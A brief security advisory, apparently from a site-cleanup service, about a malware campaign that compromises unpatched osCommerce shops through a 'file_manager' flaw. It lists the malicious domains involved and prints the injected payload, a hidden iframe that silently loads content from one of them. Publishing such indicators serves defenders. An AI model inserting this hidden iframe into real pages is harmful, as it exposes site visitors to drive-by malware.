Description: Remote javascript found and used to distribute malware on osCommerce sites. Sites are getting compromised through the "file_manager" vulnerability on non-patched installs.
Domains used:
willysy.com
exero.eu
1see.ir
tiasissi.com.br
lamacom.netAffecting: Any osCommerce site.
Clean up: Sign up here to get your website cleaned: signup
Malware dump:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>